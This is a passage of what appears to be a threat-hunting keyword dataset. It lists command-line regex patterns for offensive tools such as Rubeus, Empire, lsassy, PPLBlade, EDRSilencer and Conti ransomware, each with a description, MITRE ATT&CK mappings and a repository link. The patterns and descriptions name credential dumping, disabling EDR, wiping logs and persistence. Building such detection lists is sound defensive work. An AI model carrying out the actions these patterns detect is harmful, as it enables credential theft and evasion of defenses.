dpapi_domain_backupkey.py*",".{0,1000}\sdpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* dpapi_masterkey.py*",".{0,1000}\sdpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* DPAPImk2john.py*",".{0,1000}\sDPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* dpipe.sh*",".{0,1000}\sdpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "* dragoncastle.py*",".{0,1000}\sdragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "* DraytekScan*",".{0,1000}\sDraytekScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* drda-brute.nse*",".{0,1000}\sdrda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* drda-info.nse*",".{0,1000}\sdrda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DriverName *Xeroxxx*",".{0,1000}\sDriverName\s.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --drop-drag-and-drop-target*",".{0,1000}\s\-\-drop\-drag\-and\-drop\-target.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DSInternals.psd1*",".{0,1000}\sDSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - 
TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "* dump * /service:*",".{0,1000}\sdump\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* dump --bucket *--dump-dir*",".{0,1000}\sdump\s\-\-bucket\s.{0,1000}\-\-dump\-dir.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "* dump.ps1*",".{0,1000}\sdump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --dump_file Keepass.exe.dmp*",".{0,1000}\s\-\-dump_file\sKeepass\.exe\.dmp.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* dump_memory64*",".{0,1000}\sdump_memory64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "* --dump-adcs*",".{0,1000}\s\-\-dump\-adcs.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -DumpCerts *",".{0,1000}\s\-DumpCerts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -DumpCreds *",".{0,1000}\s\-DumpCreds\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* dumpCredStore.ps1*",".{0,1000}\sdumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "* --dump-gmsa*",".{0,1000}\s\-\-dump\-gmsa.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* --dump-laps*",".{0,1000}\s\-\-dump\-laps.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* DumpLsass.ps1*",".{0,1000}\sDumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* --dumpmode network --network raw --ip * --port 
*",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\sraw\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dumpmode network --network smb *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\ssmb\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dump-name *lsass*",".{0,1000}\s\-\-dump\-name\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "* --dumpname lsass.dmp*",".{0,1000}\s\-\-dumpname\slsass\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* 
duplicates.nse*",".{0,1000}\sduplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *",".{0,1000}\s\-e\sbat\scom\svbs\sps1\spsd1\spsm1\spem\skey\srsa\spub\sreg\stxt\scfg\sconf\sconfig\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *",".{0,1000}\s\-e\spfx\sp12\spkcs12\spem\skey\scrt\scer\scsr\sjks\skeystore\skey\skeys\sder\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -e ppk rsa pem ssh rsa*",".{0,1000}\s\-e\sppk\srsa\spem\sssh\srsa.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* e2e_test.py*",".{0,1000}\se2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* eap-info.nse*",".{0,1000}\seap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ebapc_injection.exe*",".{0,1000}\sebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* ebowla.py*",".{0,1000}\sebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "* edge logindata *",".{0,1000}\sedge\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* edge masterkey *",".{0,1000}\sedge\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* ediH:edoMwodniWwohS-*",".{0,1000}\sediH\:edoMwodniWwohS\-.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* edraser.py*",".{0,1000}\sedraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* EDRSilencer.c*",".{0,1000}\sEDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "* EfiDSEFix.cpp*",".{0,1000}\sEfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "* EfsPotato*",".{0,1000}\sEfsPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Egress-Assess's FTP server*",".{0,1000}\sEgress\-Assess\'s\sFTP\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -ElevatedPersistenceOption *",".{0,1000}\s\-ElevatedPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
